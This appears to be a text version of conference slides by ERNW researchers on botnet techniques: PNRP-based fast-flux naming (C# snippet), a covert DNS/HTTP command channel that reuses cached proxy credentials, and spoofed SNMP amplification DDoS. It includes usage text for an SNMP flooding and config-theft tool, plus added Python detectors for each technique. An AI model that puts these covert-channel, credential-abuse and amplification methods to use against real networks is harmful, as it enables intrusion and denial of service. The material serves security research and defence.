Everything you are about to see, hear, read and experience is for educational purposes only. No warranties or guarantees, implied or otherwise, are in effect. Use of these tools, techniques and technologies is at your own risk.




Who we are 
■ Old-school network geeks.

■ Working as security researchers for the Germany-based ERNW GmbH.

■ Fiddling around with devices and protocols makes up the majority of our days.



We really like Shmoo ;-) 



Motivation 
■ This talk is a loose collection of techniques that can somehow play a role in botnets.

■ We present them partly as "pure academic research", but also for a better understanding of "modern distributed threats".



■ And, of course, demos are always fun... 



Agenda 
■ A few botnet basics
■ Nearly untraceable master-bot communication
■ An elegant bot2master channel
■ Perform DDoS without p0wning hosts
■ Conclusions



What is a bot 
A bot typically is some kind of malware that uses the compromised system for remote-controlled actions like

■ Sending spam
■ Performing DDoS attacks
■ Clicking banners for fun and profit
■ Etc...

There are some common phases a bot runs through:

■ Initial Infection
■ Contact to botmaster(s)
■ Download of payloads / instructions
■ Malicious actions



Phases of a Bot - Phase 1
✓ Initial Infection (e.g. mail attachment)
■ Contact to botmaster(s)
■ Download of payloads / instructions
■ Malicious actions

Phases of a Bot - Phase 2
✓ Initial Infection
✓ Contact to botmaster(s)
■ Download of payloads / instructions
■ Malicious actions

Phases of a Bot - Phase 3
✓ Initial Infection
✓ Contact to botmaster(s)
✓ Download of payloads / instructions (to the infected systems)
■ Malicious actions

Phases of a Bot - Phase 4
✓ Initial Infection
✓ Contact to botmaster(s)
✓ Download of payloads / instructions
✓ Malicious actions (e.g. DDoS attack against a server, directed by the botmaster)
Malicious Actions

■ Infection of other systems (Recruiting)
■ Relaying of spam
■ Implementation of proxies for various services (diagram: chained proxy boxes)
■ Automated clicks on (paid) advertisement banners (slide image: AdSense)
IRC Communication (the traditional way)
What does fast flux mean?

■ There is a service (e.g. some kind of malicious website)
■ High availability
■ Register some name(s) with a few DNS A records
■ The registered IP addresses are the proxying flux-bots

Two flavors

■ Single Flux
  » Proxying services with the help of the flux-bots
■ Double Flux
  » Proxying services with the help of the flux-bots
  » Even the NS records are on flux-bots



How does fast flux work?

(diagram: the client reaches the service through the proxying flux-bots; the botmaster sits behind them)



Goals of Fast Flux 
Simplified management

■ Potentially only the botmaster has a complex setup
■ No need to set up / hack / maintain many servers

Additional protection layers for hiding the botmaster

Extends the lifespan of the critical backend core server(s)

■ The botmaster / mothership



Enough basics 
Now we are going to show some ideas / novel approaches for how some of these steps could be done more efficiently.

Nearly untraceable master-bot discovery and 
communication 

An elegant bot2master channel 



Perform DDoS without pOwning hosts 



Abuse someone else's infrastructure for fast flux

MS got a bunch of new, tricky peer-to-peer protocols, all starting with the Windows Vista distribution.

Some of them deal with the IPv6 migration

■ Like Teredo

Others with new link-local and P2P node discovery or service distribution

■ The "Bonjour-killer" PNRP, for example



PNRP - Peer Name Resolution Protocol

■ Distributed name resolution protocol
■ Provides dynamic "peer name" publication and resolution
■ _requires IPv6_
■ Enabled by default on WinVista (+ somehow in XP SP3)
■ Two flavors of names
  » Secure names -> PUBKEYHASH . NAME
    Keypair is generated on the fly (the first time only)
    Used for signing the registration request
  » Unsecure names -> . NAME
    Can easily be spoofed



PNRP 
"PNRP is, by my definition, a truly peer-to-peer protocol. There is no central state server, no central registration server. If you publish a peer name registration globally through PNRP, you do not need to have a single central server on which to place that record." - MSDN

No mandate for a central host. Companies can run their own PNRP servers.

Currently the main centralized ("internet scale") PNRP servers are operated by Microsoft itself.



PNRP 
■ It is amazingly fast to register a name.



■ At that point fast flux ideas are coming into play. 



PNRP- fast flux 
Bots have a shared salt.

The botmaster uses PNRP to register a hostname.

This hostname is a hash of:

■ The shared salt
■ The system time (quantised to a 10 or 15 minute window, which tolerates clock jitter and at the same time provides the update interval for the fast flux)

This hostname is calculated by all drones.

It gets resolved via PNRP.

It disappears after the interval timeout.



The naming logic 
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private static string GetPeerName ( ) 
{ 

string name = string. Format ( "{ 0} { 1} { 2 } { 3 } { 4} { 5} ' 

_entropy, 

DateTime .Now. Tear, 

DateTime .Now. Month, 

DateTime .Now. Day, 

DateTime .Now. Hour, 

DateTime .Now. Minute 

); 



using (SHAlCryptoServiceProvider algo = new SHAlCryptoServiceProvider () ) 
{ 

byte[] nameBytes = Encoding. UTFS . GetBytes (name) ; 

byte[] nameHash = algo . CoinputeHash (nameBytes) ; 

return Convert . ToBase64String (nameHash) ; 



The naming logic 
Build a string based on:

■ The entropy / shared secret of the bots and the master
■ The current date and time

Make a hash of this string

Register the hash as the peername
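Added illustration, not the talk's code: the same naming logic in Python, but with the 10 or 15 minute window the slide describes rather than the per-minute timestamp of the C# snippet, so two drones with the same salt derive the same name anywhere inside a window and a new one at its boundary. It also carries the check a defender can run over the names listed by `netsh p2p pnrp cloud show names`: a base64-encoded SHA-1 digest is always 28 characters ending in '=', a shape that human-chosen peer names rarely have. The salt, timestamps and sample names are constructed.

```python
import base64
import hashlib
import re
from datetime import datetime


def derive_peer_name(salt: str, when: datetime, window_minutes: int = 15) -> str:
    """Name = base64(SHA-1(salt + year + month + day + hour + window-start minute)).

    The slide's C# hashes the raw minute; quantising it to the start of the
    window is what lets the drones tolerate a few seconds of clock jitter."""
    slot = when.minute - (when.minute % window_minutes)
    material = f"{salt}{when.year}{when.month}{when.day}{when.hour}{slot}"
    digest = hashlib.sha1(material.encode("utf-8")).digest()
    return base64.b64encode(digest).decode("ascii")


def rotation_check(salt: str = "constructed-salt") -> dict:
    """Constructed timestamps: t0 and t1 share the 10:15-10:29 window, t2 opens the next."""
    t0 = datetime(2008, 9, 16, 10, 16, 30)
    t1 = datetime(2008, 9, 16, 10, 29, 59)
    t2 = datetime(2008, 9, 16, 10, 30, 0)
    n0, n1, n2 = (derive_peer_name(salt, t) for t in (t0, t1, t2))
    return {"same_window": n0 == n1, "rotated": n0 != n2, "name": n0}


# Defender's check: a base64-encoded 20-byte digest is exactly 28 characters,
# the last one a padding '='. Names chosen by people or applications seldom
# look like that, so such a classifier in the cloud listing deserves a look.
HASH_SHAPED = re.compile(r"^[A-Za-z0-9+/]{27}=$")


def looks_like_hashed_name(name: str) -> bool:
    return HASH_SHAPED.match(name) is not None


def flag_suspicious(peer_names):
    """Takes full peer names (authority.classifier, as on the slide: PUBKEYHASH.NAME,
    or authority 0 for an unsecure name) and returns those with a hash-shaped classifier."""
    flagged = []
    for full in peer_names:
        classifier = full.split(".", 1)[1] if "." in full else full
        if looks_like_hashed_name(classifier):
            flagged.append(full)
    return flagged


if __name__ == "__main__":
    result = rotation_check()
    print(result)
    sample = ["0.printer-floor3", "0." + result["name"], "0.alice-laptop"]  # constructed
    print(flag_suspicious(sample))
```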



PNRP- fast flux 
(diagram)

1) The botmaster registers a name, e.g.
   Ppxmgb06doj3eaz7n-v3a6fwd7beibh8iqfsa0c.p0.pnrp.net

PNRP - Demo
The source

Written in C# with .NET Framework 3.5

■ Available for Windows Vista and Server 2008
■ Windows XP
  » With the P2P networking package

■ 80 lines of code for registration
■ 100 lines of code for resolving
■ 70 lines of code for a simple echo service



PNRP - future improvements 
Extended payload

■ Gets registered with your peer name
■ Can fit up to 4K
■ Like your name, it can be cryptographically signed
■ Only transmitted if someone resolves your name

_PERFECT_ approach for hidden communication channels within a fast-flux network.

Can also be used to store + distribute payloads.

-> PeerPnrpRegister() with the payload in a PEER_PNRP_REGISTRATION_INFO structure



Scared ? 
Go watch your names:



netsh p2p pnrp cloud show names 



And look out for 'unseasonably formatted' names ;-) 



Project ET

■ ET is the codename for an internal research project and environmental testing tool to build a hidden communication channel to the "outside world" (say, from within a company network).

■ It can be used as an elegant bot2master channel as well...

■ ET really phones home :-)



The goals 
■ Get a bi-directional connection that works
  » Through firewalls
  » Behind proxies

Use the few open holes

■ DNS lookup
■ Dedicated HTTP proxies

Runs on (almost) every Windows box.



The source 
■ Written in C# with .NET Framework 2.0.

■ Distributed in two parts, the server and the client 
component. 



■ Not in a fully productive state, yet. 



The client 
Has a GUI to keep the user informed about the different connection tests (if the user should be informed ;-)

Uses only very commonly used system calls which don't need special privileges (unlike raw sockets).

E.g. the DNS communication only needs the System.Net.Dns.GetHostEntry() .NET call.



The client

(screenshot of the client GUI: buttons "start DnsTest" / "stop DnsTest" and "start ProxyTest" / "stop ProxyTest"; the log pane shows:
DnsTest initiated.
Found server. Starting poll thread.
Rcvd: SLEEP
Sleeping 5 seconds...)



The server 
■ Implements a pseudo DNS and an HTTP server

■ Does not implement "real" DNS and HTTP functionality but merely one endpoint of the communication flow.

Includes a GUI to visualize the connected clients and interact, e.g.

■ send (cmd) commands
■ collect system information



The server

(screenshot of the server GUI: "Start DNS listener" / "Stop DNS listener" buttons and "Log" / "Clients" tabs; the log pane shows system information collected from a client, e.g. installed updates KB 927802, KB 927891, KB 928255, KB 928843 and two NICs: a VMware Accelerated AMD PCNet Adapter with DHCP-assigned address 192.168.79.128 from DHCP server 192.168.79.254, and a Microsoft Loopback Adapter)

The server

(screenshot of the "Clients" tab: two connected clients, 35958 and 42532, arrived 9/16/2008 10:14:30 AM from 127.0.0.1:34631 and 10:14:33 AM from 127.0.0.1:17516, each with Answers / Old Answers entries and a State field; a "Clear" button)



The DNS channel 
Nothing new. Everyone tunnels everything through DNS ;-)
Still possible, even in LARGE company networks.

Your way home is to resolve a hostname like DEADBEEF.test.ernw.de

The server component needs to be registered as the name server for the appropriate sub domain (test.ernw.de in this example).

Data is hidden in the hostname (DEADBEEF).

The server gets your data and answers your request.



The DNS channel

(Wireshark screenshot of the client's query: frame 26, 83 bytes, Linux cooked capture, IP 80.187.51.101 -> 193.254.160.1, UDP source port 34339 -> port 53 (domain); DNS standard query, transaction ID 0x9f88, flags 0x0100, Questions: 1, Answer / Authority / Additional RRs: 0; query deadbeef.test.ernw.de, type A (Host address), class IN (0x0001))

ERNW - Living Security.


The DNS channel 
The way back into the company network is the answer packet of your server.

The data is hidden in the address fields of the DNS answer packet.



The DNS channel

(Wireshark screenshot of the server's answer packet: UDP source port 53 (domain) -> port 34339, DNS response to request 49 after 0.32 seconds, transaction ID 0xc133, flags 0x8180 (standard query response, no error), Questions: 1, Answer RRs: 5, Authority RRs: 7, Additional RRs: 7; the answer section of this example is an ordinary lookup of suggestqueries.google.com: a CNAME to suggestqueries.l.google.com followed by A records 74.125.43.104, 74.125.43.147, 74.125.43.99 and 74.125.43.103)

The DNS channel

(Wireshark screenshot, detail of the A records in that answer: each Type A (Host address), Class IN (0x0001), time to live 1 minute 32 seconds, data length 4; the hex dump highlights the 4-byte address fields, the place where the channel carries its return data)

The DNS channel 
■ The code must take care of some details:
  » Getting the requests in the right order
  » Disallowing caching
  » Don't get packets larger than 512 B, otherwise TCP will be used for transport (in our test environment we actually found a limitation of around 24 B of user data per request).



The HTTP channel 
Works almost like the DNS channel

Request some URL like

■ www.ernw.de/test/DEADBEEF, encoding the data in the URL, or
■ www.ernw.de/test.cgi?data=DEADBEEF, encoding the data in the parameter

The server answer will hold the data encoded in the HTML body

Not yet implemented



Find the HTTP proxy 
Read the Windows system configuration and Internet Explorer proxy settings.

Get (thanks .NET) an instance of the Internet Explorer object and abuse cached proxy authentication credentials.

Use a logged-on user context to pass proxy NTLM auth.



How to encode the data 
We use BASE64 encoding for HTTP and BASE32 encoding for DNS because both are ASCII based.

To transfer binary data we need to encode it as ASCII to avoid detection by application layer inspection.
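Added example, not part of Project ET: a detector in the spirit of the statistics-based approach the talk recommends, run over constructed query-log lines. It keys on what the DNS channel described above necessarily leaves behind: many distinct, never-repeating hostnames under one zone, each with a long first label drawn from the base32 alphabet (24 bytes of user data base32-encode to 39 characters, 40 with padding, fitting a 63-character label), produced by a polling client. The log layout ("epoch client qname") and the chunk contents are constructed, not a specific resolver's format.

```python
import base64
import hashlib
import math
import re
from collections import defaultdict


# Base32 is the alphabet the talk uses for the DNS direction: A-Z and 2-7 are
# legal in a hostname label. 24 bytes become 39 characters once the '='
# padding, which a label cannot carry, is stripped.
def encode_label(data: bytes) -> str:
    return base64.b32encode(data).decode("ascii").rstrip("=")


def decode_label(label: str) -> bytes:
    """Forensic helper: recover the bytes a captured label carried."""
    padded = label.upper() + "=" * (-len(label) % 8)
    return base64.b32decode(padded)


def build_sample_log() -> str:
    """Constructed resolver log, one 'epoch client qname' triple per line: one client
    polls the channel every 5 s with a fresh 24-byte chunk (hash-derived stand-in
    for binary data), another client browses normally."""
    lines = []
    for i in range(5):
        chunk = hashlib.sha256(b"constructed chunk %d" % i).digest()[:24]
        lines.append(f"{1221552870 + 5 * i} 10.1.2.7 {encode_label(chunk)}.test.ernw.de")
    lines += ["1221552872 10.1.2.9 www.ernw.de",
              "1221552879 10.1.2.9 mail.example.org",
              "1221552884 10.1.2.9 www.example.org"]
    return "\n".join(lines)


BASE32_LABEL = re.compile(r"^[A-Z2-7]{16,63}$", re.IGNORECASE)


def shannon_entropy(s: str) -> float:
    """Bits per character: random base32 text approaches 5, English words sit near 3."""
    n = len(s)
    counts = defaultdict(int)
    for ch in s.lower():
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_zone(qname: str, depth: int = 3) -> str:
    """Group by the last `depth` labels (test.ernw.de); a simplification."""
    return ".".join(qname.lower().rstrip(".").split(".")[-depth:])


def find_tunnel_zones(log_text: str, min_unique: int = 5, min_entropy: float = 3.5):
    """Zones where one client sent at least min_unique distinct, high-entropy,
    base32-shaped first labels and never repeated one: the channel must defeat
    caching, so every poll carries a name the resolver has not seen before."""
    seen = defaultdict(lambda: defaultdict(list))      # zone -> client -> labels
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, client, qname = line.split()
        first = qname.split(".", 1)[0]
        if BASE32_LABEL.match(first) and shannon_entropy(first) >= min_entropy:
            seen[registered_zone(qname)][client].append(first)
    hits = []
    for zone, clients in seen.items():
        for client, labels in clients.items():
            if len(labels) >= min_unique and len(set(labels)) == len(labels):
                hits.append((zone, client, len(labels)))
    return hits


if __name__ == "__main__":
    for zone, client, n in find_tunnel_zones(build_sample_log()):
        print(f"{client} sent {n} unique encoded labels under {zone}")
```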



Some problems left 
■ Both DNS and HTTP are client-initiated protocols
  » On DNS you need to resolve a hostname to receive data.
  » On HTTP you need to request a webpage to receive data.

-> The client needs to implement some polling mechanism to check for data to receive.



Project ET - Demo 
Conclusions and outlook

The next step is to improve the file transfer mechanism.

When that's done, one can reflect on all sorts of evil botnet functions like dynamic byte code distribution and execution.

Note: the best way to detect this stuff are anomaly / statistics based approaches (feed Netflow data into analysis).



Build botnets without OS compromise 
When deployment of a client (bot) component is not an option.
Potentially no need for communication infrastructure.

■ You have to (ab-)use flawed protocols
■ Remember SNMP ;-)

See also:
http://www.ernw.de/content/e7/e181/e671/download690/ERNW_026_SNMP_HitB_Dubai_2007_ger.pdf



Well known SNMP vulnerabilities 
■ Communities are transmitted in clear text
■ Communities have well-known defaults ("public" for RO, "private" for RW)
■ Protocol is UDP-based => packets may be spoofed
■ Usually no logging of failed access attempts
■ Corporate password change policies are rarely enforced with SNMP community strings ("Don't touch them, we will lose NW mgmt!" ;-)



SNMPv3 
Nobody uses v3 ("Laziness")

v3 not fully supported by major NMS vendors (CWorks, HP-OV)

Why?

- v3 has a completely different architecture
- Design weaknesses in v3
  - e.g. the configuration must not be visible
    => is not displayed in "sh run"
    => repository tools / version diffs won't work for this

Security-wise, SNMPv3 has been strongly recommended for many years

■ But it suffers from its own problems, see next slide...



The SNMPv3 bug

(screenshot of the US-CERT National Cyber Alert System, Technical Cyber Security Alert TA08-162A, "SNMPv3 Authentication Bypass Vulnerability"; systems affected include Net-SNMP 5.4.1, 5.3.2, 5.2.4, 5.1.4 and 5.0, the rest of the list being cut off; the alert describes the message authentication code (HMAC) SNMPv3 calculates with a cryptographic hash function and a secret key, and the authentication bypass in affected implementations)

Scanning the internet, some statistics (2007)

■ Of 240.000 alive addresses...
■ ~16.000 with SNMP "public" (one out of 15 !!!)
■ ~700 with SNMP "private" (3 out of 1000)
■ => in 350 million alive nodes approx. 1.000.000 privates
■ There are big regional differences (chart: RIPE, ARIN, APNIC, LACNIC)
Findings from Operator Space

dmende@ws23$ grep private results.txt | grep extremenetworks | wc -l
462

Mainly:

■ Summit48si
■ Alpine 3804

dmende@ws23$ grep private results.txt | grep Alpine | wc -l
83



So here are your bots

(screenshot of the Extreme Networks product page for the Alpine 3800 chassis switches, marketed for Metropolitan Area Networks, service provider and enterprise data centers, multi-tenant buildings and enterprise wiring closets, with links to data sheet, comparison chart, product brief and Visio icons)

and here are even more !!!
(D)DoS 
Amplification Attacks (remember "Smurf"?)

Steps needed:

- compile a list of devices (will even be fast enough without, due to UDP)
- write some long strings to chosen places (e.g. sysContact)
- perform snmpbulkwalk on these places
- spoof the source address of this operation with the victim's IP

Bytes needed for the "command+control" packet: approx. 60 bytes

Bytes sent back (in some tests): up to 1500

=> with one 2 MBit (upstream) line, 50 MBit of the victim can be saturated

Probably even much better ratios possible
=> more research needed.
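Added example, not from the talk: the 60-byte request and up-to-1500-byte answer above give an amplification factor of 25, which is exactly the ratio behind the 2 MBit -> 50 MBit figure. The functions below apply that arithmetic to constructed NetFlow-style records, as the conclusion slide suggests, and flag the two views a defender gets: a device answering on UDP/161 with far more bytes than it received from a given peer (the reflector's side), and a destination receiving SNMP answers from many devices at once (the victim's side). Record field names and the addresses are assumed, not a specific exporter's format.

```python
from collections import defaultdict

# Figures from the slide: ~60-byte request packet, answers of up to 1500 bytes.
REQUEST_BYTES = 60
RESPONSE_BYTES = 1500


def amplification_factor(request_bytes: int = REQUEST_BYTES,
                         response_bytes: int = RESPONSE_BYTES) -> float:
    return response_bytes / request_bytes            # 1500 / 60 = 25


def victim_load_mbit(spoofer_upstream_mbit: float) -> float:
    """Bandwidth arriving at the victim: the slide's 2 MBit -> 50 MBit case."""
    return spoofer_upstream_mbit * amplification_factor()


def flow(src, sport, dst, dport, nbytes, proto=17):
    """Minimal NetFlow-like record; field names are assumed, not an exporter's."""
    return {"src": src, "sport": sport, "dst": dst, "dport": dport,
            "proto": proto, "bytes": nbytes}


# Constructed flows as seen at the reflecting devices' border. 198.51.100.9 is
# the victim whose address was spoofed into GET requests towards three SNMP
# devices; 10.0.0.5 is a legitimate management station polling one of them.
SAMPLE_FLOWS = [
    flow("198.51.100.9", 40001, "203.0.113.11", 161, 1200),   # 20 spoofed requests
    flow("203.0.113.11", 161, "198.51.100.9", 40001, 30000),  # 20 x 1500-byte answers
    flow("198.51.100.9", 40002, "203.0.113.12", 161, 1200),
    flow("203.0.113.12", 161, "198.51.100.9", 40002, 30000),
    flow("198.51.100.9", 40003, "203.0.113.13", 161, 1200),
    flow("203.0.113.13", 161, "198.51.100.9", 40003, 30000),
    flow("10.0.0.5", 5000, "203.0.113.11", 161, 600),          # normal NMS poll
    flow("203.0.113.11", 161, "10.0.0.5", 5000, 1400),
]


def reflector_view(flows, ratio_threshold: float = 10.0):
    """(device, peer, bytes out / bytes in) for every device answering on UDP/161
    with far more than it received from that peer. The threshold is a starting
    point to tune against the site's real polling traffic."""
    rx, tx = defaultdict(int), defaultdict(int)
    for f in flows:
        if f["proto"] != 17:
            continue
        if f["dport"] == 161:
            rx[(f["dst"], f["src"])] += f["bytes"]
        elif f["sport"] == 161:
            tx[(f["src"], f["dst"])] += f["bytes"]
    hits = []
    for key, sent in tx.items():
        received = rx.get(key, 0)
        ratio = sent / received if received else float("inf")
        if ratio >= ratio_threshold:
            hits.append((key[0], key[1], ratio))
    return sorted(hits)


def victim_view(flows, min_sources: int = 3, min_bytes: int = 50_000):
    """(destination, distinct answering devices, bytes) for destinations receiving
    SNMP answers from many devices at once: what the flooded victim's flows show."""
    sources, total = defaultdict(set), defaultdict(int)
    for f in flows:
        if f["proto"] == 17 and f["sport"] == 161:
            sources[f["dst"]].add(f["src"])
            total[f["dst"]] += f["bytes"]
    return sorted((dst, len(devs), total[dst]) for dst, devs in sources.items()
                  if len(devs) >= min_sources and total[dst] >= min_bytes)


if __name__ == "__main__":
    print(f"factor {amplification_factor():.0f}x, 2 MBit upstream -> {victim_load_mbit(2):.0f} MBit")
    print(reflector_view(SAMPLE_FLOWS))
    print(victim_view(SAMPLE_FLOWS))
```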



Amplification Attack - SNMP
Scenario: SET command

(diagram: the attacker writes long strings into the SNMP-write enabled network devices; the victim, e.g. a router, is not yet involved)

Amplification Attack - SNMP
Scenario: spoofed GET request

(diagram: GET requests spoofed with the address of the victim go to the SNMP-write enabled network devices; each answers with up to 1500 bytes of payload)

Amplification Attack - SNMP
Scenario: flood of GET responses

(diagram: the SNMP-write enabled network devices flood the victim with 1500-byte answer payloads)
A tool for PoC: snmpattack.pl 
Usage: snmpattack.pl [-FhIrv] [-A type] [-c comm1,comm2] [-C tftp] [-f target] [-s type]
                     [-l delimiter] {ip/range | input file}

  -A type       Do APC specific attacks (type: 1 = allON, 3 = allOFF, 4 = allREBOOT)
  -c comm       Add communities to check for (comma separated)
  -C tftp       Do Cisco specific attacks and specify a tftp server for config upload
  -f target     Switch to flood-mode
  -F            Don't ask for involving flood-hosts. Start them all.
  -h            Print this help
  -I            Do InnoMedia specific attacks
  -l delimiter  Parse IPs from file, seperatet with the given delimiter
  -p port       The port for tcp syn scan (default = 80)
  -r            Test for RO / RW community
  -s type       Scans the given ip/range (type: snmp, icmp, syn | default = snmp)
  -t num        Count of parallel scans (default = 10)
  -v            Be verbose

scan and attack all found devices:
# snmpattack.pl -I 10.0.0.0/24

scan and use all founds as relay hosts:
# snmpattack.pl -s syn -p 21 -v -f 1.2.3.4 10.0.0.0/24

http://www.ernw.de/download/snmpattack.pl



Summary 
There are quite a few protocols that can be used in a way probably not intended by their designers.

Some of these protocols have been present since the early days of the internet and were designed without too much security in mind. You should know and understand those mechanisms.

Many functions of traditional botnets might be performed more efficiently with novel approaches.

So, again, the mitigating controls have to be adapted.

At tomorrow's sunrise all the code shown will be available at:
www.ernw.de/download/shmoobots.tar



Questions? 
and, for sure, all of you for listening to us

Thanks for your attention!